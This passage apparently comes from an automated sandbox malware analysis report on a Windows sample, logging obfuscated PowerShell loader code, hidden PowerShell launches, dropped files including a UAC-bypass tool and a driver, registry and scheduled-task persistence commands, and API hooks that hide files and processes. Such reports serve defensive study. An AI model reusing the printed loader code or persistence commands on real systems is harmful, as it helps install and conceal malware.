,[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91CA7DD push rcx; retf 003Fh18_3_0000025EE91CA7DE
        Source: C:\Windows\System32\conhost.exeCode function: 19_3_000001AD31CAA7DD push rcx; retf 003Fh19_3_000001AD31CAA7DE
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11F99C pushfd ; ret 20_2_00000113DB11F99D
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00007FF7C14D1C7A push ebx; ret 20_2_00007FF7C14D1CEA
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55F99C pushfd ; ret 30_2_0000021E7B55F99D
        Source: C:\Windows\System32\conhost.exeCode function: 36_3_00000236C6DDA7DD push rcx; retf 003Fh36_3_00000236C6DDA7DE
        Source: C:\Windows\System32\cmd.exeCode function: 44_3_0000015829E8A7DD push rcx; retf 003Fh44_3_0000015829E8A7DE
        Source: C:\Windows\System32\conhost.exeCode function: 45_3_000001D643A7A7DD push rcx; retf 003Fh45_3_000001D643A7A7DE
        Source: C:\Windows\System32\conhost.exeCode function: 58_3_000002063183A7DD push rcx; retf 003Fh58_3_000002063183A7DE
        Source: C:\Windows\System32\conhost.exeCode function: 69_3_000001CCE365A7DD push rcx; retf 003Fh69_3_000001CCE365A7DE
        Source: C:\Windows\System32\conhost.exeCode function: 70_3_000001858EA2A7DD push rcx; retf 003Fh70_3_000001858EA2A7DE
        Source: C:\Windows\System32\conhost.exeCode function: 73_3_000002942EBFA7DD push rcx; retf 003Fh73_3_000002942EBFA7DE
        Source: C:\Windows\System32\conhost.exeCode function: 83_3_000001C8A039A7DD push rcx; retf 003Fh83_3_000001C8A039A7DE
        Source: C:\Windows\System32\conhost.exeCode function: 87_3_000001E5EF04A7DD push rcx; retf 003Fh87_3_000001E5EF04A7DE
        Source: C:\Windows\System32\dllhost.exeCode function: 96_3_000002ADD624A7DD push rcx; retf 003Fh96_3_000002ADD624A7DE
        Source: C:\Windows\System32\conhost.exeCode function: 99_3_0000021C0EE6A7DD push rcx; retf 003Fh99_3_0000021C0EE6A7DE
        Source: C:\Windows\System32\winlogon.exeCode function: 101_3_000001FC6039A7DD push rcx; retf 003Fh101_3_000001FC6039A7DE
        Source: C:\Windows\System32\lsass.exeCode function: 103_3_00000161C735A7DD push rcx; retf 003Fh103_3_00000161C735A7DE

        Persistence and Installation Behavior

        barindex
        Sample is not signed and drops a device driver
        Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
        Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\services64.exeJump to dropped file
        Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeJump to dropped file
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeFile created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeJump to dropped file
        Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeFile created: C:\Users\user\AppData\Local\Temp\paint.exeJump to dropped file

        Boot Survival

        barindex
        Creates an autostart registry key pointing to binary in C:\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
        Creates autostart registry keys with suspicious names
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
        Creates autostart registry keys with suspicious values (likely registry only malware)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
        Hooks files or directories query functions (used to hide files and directories)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Hooks processes query functions (used to hide processes)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Hooks registry keys query functions (used to hide registry keys)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
